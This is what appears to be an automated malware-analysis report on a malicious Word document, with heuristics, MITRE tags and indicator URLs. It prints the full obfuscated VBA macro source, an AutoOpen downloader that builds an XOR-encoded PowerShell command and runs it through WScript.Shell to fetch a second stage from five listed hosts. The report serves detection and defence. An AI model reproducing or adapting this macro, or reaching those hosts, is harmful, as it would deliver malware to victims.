MALICIOUS
350
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing VBA macros. The AutoOpen macro triggers the execution of a PowerShell command, reconstructed as 'wershell [String]::jOIN('',', which is likely intended to download and execute a second-stage payload. This is further supported by heuristics indicating Shell() calls and WScript.Shell usage within the VBA code.
Heuristics 11
-
ClamAV: Doc.Malware.Valyria-7165739-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-7165739-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
HJoLp = (uwWkK * dGzAV - aoWsc - ijbusF * (jPiii * 35582) + (rAjdk - 66424)) kOziAsF = zQlUXujAA + CreateObject("Wscript.shell").Run(GPtbDYBTsjz + Chr(vbKeyP) + suGlM + Chr(vbKeyO) + EBOuRljVLwOYZ + asQKDH, 847904596 - 847904596) bvlXjX = (LsvbL * mNsZzI - nNztk - hWTrw * (DWGCj * 5163) + (Voiljk - 62406)) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
HJoLp = (uwWkK * dGzAV - aoWsc - ijbusF * (jPiii * 35582) + (rAjdk - 66424)) kOziAsF = zQlUXujAA + CreateObject("Wscript.shell").Run(GPtbDYBTsjz + Chr(vbKeyP) + suGlM + Chr(vbKeyO) + EBOuRljVLwOYZ + asQKDH, 847904596 - 847904596) bvlXjX = (LsvbL * mNsZzI - nNztk - hWTrw * (DWGCj * 5163) + (Voiljk - 62406)) -
Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URLA VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "MsZHQCWLA" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.islandhouse.cn/28mMVV/ Referenced by macro
- http://www.lacherprise.net/VaBnGGME/Referenced by macro
- http://doinothientrieu.com/pUp/Referenced by macro
- http://www.phukhoaanthao.com/HjvS0z/Referenced by macro
- http://primerplano.org/GDJux/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14816 bytes |
SHA-256: b9bd4a5bd2594cf30ffe1ef811bd430d608730463d9c8c20a836f9a6f3743b59 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
354 of 546 identifiers look randomly generated (e.g. 'EBOuRljVLwOYZ') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zzwVdzoECzRE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "MsZHQCWLA"
Sub AutoOpen()
On Error Resume Next
bswbAt = jkGsH / UqiIQF + DQhCm - fiKLd * YNBFX - bivLns / wBEZz / VWWdLK
EQcPZw = EwMWo / sSizp + Kscdv - hzqDFv * EPzKud - VCcXMr / zzDlZ / jtmcm
hoOjz = JbQPF / QhiqO + oLAOf - dvqWKo * bkqUkt - IvJJAH / EwnMKl / PQOTJk
ETmQc = iXaNwz / wtBrN + fYzDK - CpMTc * bJuEb - tYTUj / ZOMVp / PWFkE
jSwjZ = lvwns / fCTMPG + UwwNT - nPqFj * MuaXDJ - kBZvb / WNdSni / PDRVm
TRIERf = XAiwwt / SZJoTO + qfoUw - HzkzBA * pjtGV - zKRLq / lOzJU / vQWdm
ohNnWZ = UjWTlL / oaVsdp + qRbEMZ - ABkqu * nuQIpO - kNflo / EjvAkh / zzQmi
zWUhm = qktuKN / PbMdl + QaUaEB - IZbpdi * fOsQj - IzBLml / hStnUi / SiivPf
UfuXscsPD (zwGWOPn + zipdwnzRTR + aiAVi)
aKcIzU = rbSWF / mRQUD + dsJdl - CSjsW * flLJm - oKvcwp / LVJDo / TYVJD
MdALvJ = cJUlz / iKVNnR + TZhaB - APHpd * jEZIj - WzJPwo / YhaMp / kocZn
cYlAv = MEjrFf / DwVXv + VPzuK - CWiTIc * kwhuw - iFOtq / YmXfE / jWTRpf
bDsTil = PAvRW / WXQwG + GYlKf - dZcGlS * BQXwl - kISGYr / JCXIF / LTYFq
End Sub
Function zwGWOPn()
On Error Resume Next
UjmRii = 67691 * VvjpQZ + WYzph / 22425 - 98903 + wTXUM
PrBbD = JAZsI + cXomL + UzMuHP + Pwtbf + (79540 / uwzjhJ)
tDvFDD = qbhVE + fTLcV + PpZOj + fUWpwL + (25945 / rcrok)
VzfzS = cnTul + CNzzTp + MYilB + VIhjDb + (43645 / IlRJcv)
VqsPm = "wers" + "hell" + " " + " " + " [S" + "trinG]::" + "jOIN" + Chr(40) + " '',"
VLHInu = uUTzFf + zDUkl + oIPYt + SHfaH + (9270 / jwmEm)
mCbXV = LhWtMv + PzhMZr + fbSjF + ibrBPf + (72878 / vTjAP)
VrUda = aKhwtc + wAJMvj + kcTOu + uDwJL + (97844 / QPRTip)
TtkKmz = IBWmq + XjtYG + OhWLXk + tfjiqh + (12024 / vrrIbz)
wBOjTkQWkva = " " + Chr(40) + Chr(40) + "35 ,93" + " , 99 ," + "75,58," + " 105 ," + " 98 , 1" + "12, 42," + "104 " + ", 101,10"
hwKpd = fXwJii + sVKjuS + vkqUdh + NTdzM + (20072 / WhRdDT)
PSpkGt = AmrnAu + tQKti + iZjBz + rnfRRQ + (66139 / nYnNd)
LchXj = trkjpi + VzIpMw + RDVMSY + WotGr + (97079 / kHIzwm)
VjtId = FYYbQH + nHHVFI + WDqdzk + lqzsPJ + (20106 / UcDosD)
EVUZJZwsd = "9,98,10" + "0 ,115 ,3" + "9, 73,98" + ", 11" + "5 , 41 ," + "80 ,98" + ",101,68 ," + " 107,1"
IpNAb = QdaLt + KjPqio + YBpVVa + RViVc + (94056 / dLtMj)
aUHiw = quDkZ + SVNrr + PpvuL + DIZoh + (43045 / zjfBWS)
nRNMT = WGwJw + wbFDST + ZEsvwF + wfjXWi + (99404 / zGocC)
ERSLhf = VKZtZU + UvWOG + brZbnS + jbwPqR + (89879 / nZkQa)
qwvaEuic = "10 ,98,1" + "05,1" + "15 ," + " 60 ," + " 35 ," + " 74 , 67" + ", 70, 58,"
rIzoYN = TwZHvh + BkJjI + bokBNh + bpnTqZ + (90085 / HqGVwV)
BXjbU = hrEKqf + rznaIz + wOffs + TElcw + (78538 / sAvdaa)
JzhmoZ = wVVNVV + XwbrP + iLGQV + juuCKK + (51976 / fkUasY)
tRwdDZ = jsfiiG + wtQQB + CCSKCu + XmdAwq + (68070 / tHnRND)
RnmwsCBnb = " 32 , " + "111,1" + "15 , 115" + ",119, " + "61 ,40 ," + " 40 , 112" + ",112 , 1" + "12 ," + "41,1"
qvZpIK = uuTNJ + zNnrA + wUcFbL + pkqEK + (98678 / IOBppX)
pdGXTh = FqMnm + zfLHL + nNwhQF + DIHDm + (81422 / viiuqz)
QZKRPp = siNDd + iUOqzi + UWDpJ + bHiMz + (3484 / AfuRnM)
czFdA = HDnAKs + QNtWU + AORKS + BzqwZ + (93479 / kIdXQ)
WuNItwGXAz = "10, 116, " + "107,10" + "2 , 105," + " 99, 111" + " , 10" + "4 ,1" + "14, " + "116,98 " + ",41 ,10" + "0,105 ," + " 40 ,53 " + ",63 ,1"
QKLmDM = zWYBS + dMrvpS + dtzna + IcSBRQ + (27678 / WCmuN)
CDushO = UqTVj + CqmTp + PTwkj + Xmiqbb + (82562 / KUNjZj)
NEljBU = zjniE + rwXNY + GDXhV + kDaGJ + (9385 / cZsZH)
lFrJt = SMsWLz + OiGppX + bRQft + ihcwz + (48617 / zmGPu)
bKqjkjI = "06 , " + "74 ,81 " + ", 81 ," + "40 ,71 " + ", 11" + "1, 115, " + "115,119" + " ,61,40 " + ", 40 " + ", 112 ," + " 112, 1"
mEsOH = wWaMS + DiKGS + wJcYi + riori + (55581 / uFvcP)
NUPXE = BnHbwh + MmEdW + MImJiw + nfPNF + (21725 / BJGvz)
WcibP = dIJnQ + NvVaa + OacWca + ozGYL + (16298 / vCviU)
MPAGhr = rUhjU + HOobzA + WaLXk + iOEKzn + (12385 / bwaWok)
mWaFp = "12 ,4" + "1 , 107" + ",102" + " , 1" + "00 , 111," + "98 , " + "117 ,1" + "19 ,117 " + ",110 ,11" + "6,98 , 4" + "1,105,98"
RdbzjD = qfouz + EXtaKh + qsVYtW + SOCjId + (82079 / jhpaf)
PHsMhA = phXFv + jTJXM + bjQiF + iJPYqb + (41450 / pjpcq)
XIrUQF = rHjvO + pYHDE + SnbdI + UImoMl + (71004 / kTkiD)
QiaHTl = EBtbik + MCvfi + wzUDuz + MnWod + (56 / woMUJX)
kFKYjr = " ,11" + "5, 40 " + ", 81 , 1" + "02 ," + "69 ," + " 105,64," + "64,7" + "4,66, " + "40 ,71 "
zlXGw = ifudip + nwMzc + ODqIRr + jjfAdj + (63295 / YpJKjW)
Swvwt = shEEl + zQkLca + RckkEW + DanDv + (3222 / ptTNcw)
zPltB = hPchN + bJHdFO + zwztA + IIPGCo + (92817 / wEaWX)
cCUCTQ = FpRLEv + XRzWlv + LRIasQ + cFjGh + (46890 / wiwajG)
UvkUztiRs = ", 111 ," + " 115" + " ,115 ," + "119," + " 61 ,40," + "40 ,9" + "9,104 ,1" + "10 , 10" + "5 , 1" + "04 , " + "115 , "
hvAcVF = JMTUzk + ahOqcW + RuBIj + HXQzzc + (2346 / hjHjQw)
lNNSK = wOmbE + kwXwMJ + wEJGC + cYDhhD + (85812 / RHIzj)
NUiwRw = LFXAc + PAzUmR + mvVUX + FtzGHL + (49976 / EaSLS)
sLLazz = Ujknw + dHRwNY + sVNwQo + NLahI + (38858 / ZakvVY)
McAlramSsQ = "111 , 11" + "0,98 ," + " 105,115" + ", 117," + " 110" + ",98,1" + "14 , 41,1"
dGwZw = VkiCcX + KbLcHK + hnshEY + mTpPw + (62551 / hqGkH)
UDClG = cRaBN + dBcWZX + WMEZv + IzqOXG + (47640 / oFPiT)
KstBEJ = iZFfB + sYpNRU + QiQpn + rhdkFs + (99092 / dourcu)
dNOJN = ofsdo + hJbbD + aSkEp + nBEOjv + (41233 / ZTmUCj)
FnJCizvvBo = "00,10" + "4,106" + ", 40 " + ",119 , 8" + "2,119, 40" + " , 71, " + "111, 1" + "15, 11" + "5 , " + "119 ,61, " + "40, 40 ,1" + "12 ,112"
zwGWOPn = VqsPm + wBOjTkQWkva + EVUZJZwsd + qwvaEuic + RnmwsCBnb + WuNItwGXAz + bKqjkjI + mWaFp + kFKYjr + UvkUztiRs + McAlramSsQ + FnJCizvvBo
hLjdMW = rnzwN + nJNQdG + zSlDDu + TovMoF + (78421 / LcaMZs)
nLooW = mUnjdt + ZqVGFS + zLFBVN + iWhzN + (33702 / qDCKwE)
LtRJJ = Nbplbf + OZjZRh + DrkIII + wkpRh + (90488 / HsmulD)
MGaMZ = SmvAu + INTJIA + iPrzU + kEHjuf + (63216 / iqlJvj)
End Function
Function zipdwnzRTR()
On Error Resume Next
jTzRlz = oVfDc + FcGnTI + IwGjPc + imTvHO + (80929 / rIkjQ)
fcENHB = Lnfdz + mInusp + zTbcpU + MUpld + (99377 / VtNnUw)
pACwk = rNzPr + cplNNB + LVBCk + OEqlzC + (70302 / SSzEnf)
vUpDE = lAddv + ZFnowR + WRAcA + GzKXo + (18176 / WEPBLw)
oQzWlDzLfr = " ,112 ,41" + " , 119, " + "111, 114 " + ",108, 111" + " ,10" + "4, 10" + "2 , " + "102 ,105 " + ", 115"
vKitoW = NQVIWH + LBbXnj + qztAz + RPaHX + (83062 / BIwjAz)
zkItD = OmGYX + QYdCl + zAHjiL + odEzaM + (68586 / Xllztp)
zEUdHs = JrlPj + mENkt + VVwqOk + JhDEsX + (81657 / HmdQsH)
IXorrZ = wvLpL + MANGsc + VFmsrq + iSjUA + (65114 / MaBWt)
OLLuLn = " ,111 ," + " 102 , " + "104 ,41 ," + "100,104" + " , 106 " + ",40 ,7"
bjYtMv = JsKoFX + wRFwBO + JnfMna + nsErGU + (48345 / IkzvET)
fMptR = fvSlP + zRkRJ + zNNrn + Qccaqu + (48773 / roiYNQ)
olGME = TfBsb + RtsjYV + WAFzwD + XJVzF + (18016 / zwtFa)
TTNDz = XHhPDa + NzLjoI + kCKKE + SjTuwb + (96092 / XCmCz)
lIWFTi = "9 , 109,1" + "13, 84 ," + " 55,125," + " 40, " + "71 ," + "111 , 115" + " , 115 , "
jHWOhf = djPFtj + kGnYC + ouEEXM + OJmMEs + (20906 / FqcFH)
RFaqYi = MKzliV + OfIQh + XttvaR + TVlETi + (10374 / mBbGz)
zvLlB = cGiqzK + DlCRqV + fUtCAA + liPLT + (90341 / pztTW)
GHawN = FHjDYm + KsfBIk + RrcSf + PhOmIw + (39084 / qXtzoG)
KzQpjvZPl = "119 ,61," + "40 ," + " 40 , " + "119, 117" + " ,11" + "0, 1"
VDpXPw = bsljHc + YLfQH + RrYsRE + DcdjK + (69715 / CpEYKT)
wZzoGC = hBcRQ + WhisOz + zLCiTp + jvGKrC + (60971 / UTazJ)
rcAYMB = caWLzz + dfwFL + rzOFVX + ViHHFn + (13403 / PYUFCi)
CHULkl = JHTwl + sNvCoX + tTOGL + nOHczJ + (97989 / wHkKm)
wXbYj = "06 ,98 " + ",117 ," + "119,1" + "07 ,102,1" + "05,104," + "41 , 10" + "4, 11" + "7 ,96 ,4" + "0 ,64 , 6" + "7, 77," + " 114,127"
FMiKii = iNOWLv + lWUUQP + luSaO + FMPSPq + (12052 / wYUlLJ)
viGmQ = aSsVF + ipihQR + DIDIQd + FNpXAN + (12735 / WEmMhF)
hsojH = fzwFit + TRMkT + XVwvHU + CmwAjF + (10765 / ECdtH)
aPQMj = tXjLjR + miiwhL + iswwW + opPPiq + (23516 / zGija)
LpBAffqz = ", 40 " + ", 32" + " ,41,8" + "4, 119," + " 107 , " + "110 , 11"
VwuJl = WnPqQ + WPsWpJ + MMdUU + quSauE + (69682 / BnGNHs)
GRJjGT = UOzZzr + NsZwTj + BdJGq + wHfPti + (21180 / uEQlFW)
iZahkU = YihzCK + psbZRv + DMUmj + VblIi + (32955 / dmDnkY)
WoszB = rLvio + wXiNFv + LOwsZ + lYOCo + (77990 / tprPUW)
GIIuVwY = "5 ,47" + " , 32" + " , 71," + "32 ," + " 46,60," + "35 ,80,6" + "5 ,10" + "6 ,39,5" + "8,39 , 32" + " ,51 ,52"
JPcrw = jzSSA + UFnAaQ + wNikj + jjSnJ + (20363 / NwrNj)
SKnbzs = XtJcCQ + jzWMhA + qTttKq + fDlCbP + (41760 / hsjnwH)
trQKN = suqsGD + VlZDbf + bQYNJI + naWNa + (39413 / WcjCV)
oUqrMk = pcnuQ + jndTDA + oFUUi + jfwItA + (11567 / IHZhAZ)
wCSzGnl = ", 32" + ",60,35 ,1" + "12 , 69," + " 65 ,5" + "8 , 3" + "5 ,9" + "8 , 105 ," + " 113," + "61, 115 ,"
zQwpt = IDUTY + crthn + IrqXa + BcoSdj + (86921 / hlTcu)
ASJCU = iPnZmm + dhrrj + FtOac + zVmXd + (97915 / VRcqW)
wCXAR = COtCoL + mpPOcq + oQkpa + aWTqXQ + (74298 / FFUpG)
YmjldS = HMRWrm + fjShZ + JjuCiX + ZjkvY + (42528 / zChwM)
XwAWVwPKE = " 98 , " + "106,119," + "44 ,32" + " ,91" + " ,32," + " 44 , 35" + ", 80" + " ,65," + "106," + "44, 32,41" + " ,98, 127" + " , 98 "
zipdwnzRTR = oQzWlDzLfr + OLLuLn + lIWFTi + KzQpjvZPl + wXbYj + LpBAffqz + GIIuVwY + wCSzGnl + XwAWVwPKE
iwtJmH = IIsTHK + rGOls + jWLrrJ + SQwAqV + (97929 / ILkcSi)
ZQMkK = pEwDw + wjftfU + VvtGSj + NiIdNC + (13861 / ifilO)
ocTPT = dPDqzo + MmBRc + fsKrcm + CiudJ + (50577 / ThjYb)
boAuKs = mlWKTz + zUdkqd + wuVZh + ltiDd + (79655 / GqrQhj)
End Function
Function aiAVi()
On Error Resume Next
hhvbE = qCawLv + OLjJt + hvLvU + wabAzL + (88629 / FnNzf)
zOFQU = UKkYz + bfKDu + PBfmNu + nCbAjw + (61846 / GfLtM)
mmKDL = SwsLC + oihbW + alITOB + lRpwaz + (65589 / fRukHk)
XzhPw = WLYiRc + uGSXJ + azczSO + rJQnq + (28037 / WNKlz)
aKitC = ", 32," + " 60, " + "97, 10" + "4,117" + ",98 ,10" + "2 , 100 " + ", 111 ,47" + ",35," + " 105 , 1" + "09,102 , " + "39 , "
ItJHlR = OjqTS + WzXKA + fhHtJ + bSzVA + (97182 / iTHHV)
hiWJi = DFDJdD + DMwOk + pBafh + PwNBnD + (48885 / oruWlD)
cdUYTl = NkJbiV + ihzBA + DJzTtj + IksPpC + (59570 / hKInI)
prIWnf = bBVFHV + TiBfkt + dsulf + mAWoNs + (45660 / RqzFD)
DYsFDAAzJ = "110, 10" + "5 ,39 ,3" + "5 , 7" + "4 , 67,7" + "0,46" + ", 12" + "4 , 11" + "5, 11"
mhzMKK = UBTbMz + DGDpR + ipDPF + XaLRc + (56018 / ICUdSW)
HrjaDo = jCfqCq + lTUhZ + jmjSSm + UoRuY + (56398 / zKafKu)
mdLhMr = RlkrhT + QzdhHG + DIkrwf + MidlSj + (63278 / dWDOc)
obavJ = rFrwKP + iVbqNL + FCHFOj + LTHds + (56869 / OhJvpi)
XjOXJuNB = "7, 12" + "6 , " + "124 ,35" + ", 93" + " ,99, 75 " + ",41 , 67" + " ,104"
bQbnq = hcNoOP + RVINIR + dvkkRZ + CbtpW + (58876 / EVIfcz)
ofPZpp = iYUCv + NiRkwW + VAcAoU + QiwfK + (90844 / SzXwz)
sbcfIo = cCNWt + cjjrV + kiBUz + kBNzzi + (61642 / wlUHE)
lfZYf = cLLXo + JLPAq + dnXmJ + CfqcWq + (22403 / mNfEF)
zIqFZt = ", 11" + "2 , 10" + "5,107," + "104 ,1" + "02,99" + " , 65,11" + "0 , " + "107 ," + "98 ,47 ," + " 35,105" + ",109," + "102 ,"
STGWZ = wztVch + JGnDPk + duEco + Afvjtl + (1831 / dBuGb)
HUZSc = ujpEN + jXVHU + pRftlE + whdaO + (46575 / sJKbjl)
YOWJT = bmHfuI + cqYPd + haQCNb + jjfEsz + (77451 / wPXuJ)
QOXPml = YMFmQ + tnHLJ + cSvGDm + TrfaBU + (39268 / QMsnap)
iPLmLA = " 43,39, " + "35,112" + ",69 ,65 ," + "46,6" + "0, 84" + ",115 ,1"
YZIpW = HnTvEY + lYmOi + AfrRI + fiVWNt + (51827 / TQsXDO)
pAOpA = vqVvzT + XDvhsD + sfcJG + jMMJwf + (73079 / RfdMYs)
JINhV = OzTWws + kihHz + qJmRG + dopUf + (29291 / TErXi)
nkRjBz = BPzpj + YoXHXr + jrCYd + HlZGtH + (6300 / MfZcl)
YYlDD = "02 ,117" + ",115 ,42" + ",87, " + "117, 104," + " 100 ,98 " + ", 11" + "6, 11" + "6 , 39 " + ",35, 112"
QPdJZb = UQzhZY + KYEjS + iiMzS + FFYRVT + (19881 / bPwzj)
AsvHiG = NaivmP + WLAliY + TmplI + dRUwP + (78937 / CzMwi)
AsvMQ = NBHHY + FoKmDf + rVawzb + PEzuZ + (9700 / LEqiz)
MUEwQs = NWJpMT + plZvw + CqIEMh + bujTD + (6455 / iXRbfH)
GjHBlmoKuzN = " ,69, 65" + ", 60,1" + "01 , 11" + "7 , 9" + "8 , 10" + "2, 108" + " ,60 ," + " 122 , " + "100 ,10" + "2 , 115 "
XOUFYR = TILRqw + UjGGWZ + SvGjfz + cYwDG + (13742 / BzhQU)
UjhYk = vPTBIc + zNAjR + RPcGA + qFaJp + (46266 / XjYFq)
AUFCH = GfVrG + FpESN + tTYrj + NjphT + (64010 / qCEkz)
DYMrkG = sdBRwi + JWAwIl + pYdZLo + QXAEG + (55562 / zhcol)
FKirI = ", 100" + ", 111,1" + "24 , 12" + "2 , 122" + " " + Chr(41) + " | Fo" + "ReaCH{[" + "cHaR]" + Chr(40) + "$_ -bXo" + "R'0x07'" + Chr(41) + " } " + Chr(41) + Chr(41) + "| &" + Chr(40) + " $PshoMe" + "[4]" + Chr(43) + "$"
obsDw = sctfz + wKQTmr + jMuiVF + dzEdYH + (18280 / dwZLfl)
zSsMzz = RQmDb + jjsMV + NXmJVM + SipwBd + (57615 / iGQIWn)
jwZdK = NrDwhd + suwXz + rsXPH + pTjTub + (22805 / YczErv)
QIBhqi = mjABOM + PLhSoU + jYJVV + lPwrjB + (61526 / kWiQKq)
JXjBYq = "psho" + "me[34]" + Chr(43) + "'X'" + Chr(41) + " "
aiAVi = aKitC + DYsFDAAzJ + XjOXJuNB + zIqFZt + iPLmLA + YYlDD + GjHBlmoKuzN + FKirI + JXjBYq
wjEdaP = BiVvRc + KJXAS + ibRlZz + AdcEzF + (73181 / GEslQ)
TqHZU = HcTMkD + oVDut + wRwzZk + OprLl + (18822 / GYWmb)
dLdGMB = XwsHDI + WOTDdo + XCRvMq + EEfOBE + (3133 / oiNvw)
jjwwzp = rloHc + FIMKAL + TrNtBD + Faoqhs + (26338 / SUzOBj)
End Function
Attribute VB_Name = "jqjwBkzFO"
Function UfuXscsPD(EBOuRljVLwOYZ)
On Error Resume Next
lpaCj = (rikZSb * PIzjjF - ZplbP - zTzvwm * (KIDXh * 13277) + (JlpkiM - 97314))
qciWj = (IAvTXZ * tPvYC - JcIsFD - Ntszk * (UBTaJz * 75940) + (MJIzJR - 59786))
AKNcLb = (vDznjj * ipdfB - HEaBa - uoABw * (BASph * 38517) + (wjMzXu - 44069))
kCzGz = (cpwjL * thpvC - kiiGt - JEDpv * (DHDOJ * 72836) + (uwrYL - 42727))
JzCkmQ = (YRSCsn * qORiz - VEGXUn - jwHkl * (akKEIX * 14140) + (OVYUu - 21770))
VRhQr = (zUJoU * JrzuHm - rjEwfX - uHGsJ * (knmrW * 74605) + (iHizOt - 61118))
QUjkw = (GEriPw * vaJiQ - MljJI - poGjh * (acHTd * 52152) + (pFTfTa - 87562))
HJoLp = (uwWkK * dGzAV - aoWsc - ijbusF * (jPiii * 35582) + (rAjdk - 66424))
kOziAsF = zQlUXujAA + CreateObject("Wscript.shell").Run(GPtbDYBTsjz + Chr(vbKeyP) + suGlM + Chr(vbKeyO) + EBOuRljVLwOYZ + asQKDH, 847904596 - 847904596)
bvlXjX = (LsvbL * mNsZzI - nNztk - hWTrw * (DWGCj * 5163) + (Voiljk - 62406))
DWjIT = (JzFBO * rcGczG - XbIuX - hzRaH * (HtdfMs * 73470) + (uDjKh - 38591))
mhLKMY = (INzrn * qwrAz - ISfLL - VnTFc * (IDQuo * 16340) + (lpqNtE - 77711))
Ifrrk = (WYfHWz * rktDkk - jCvIiT - ZREmG * (HNIbN * 84298) + (mfknSI - 87252))
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.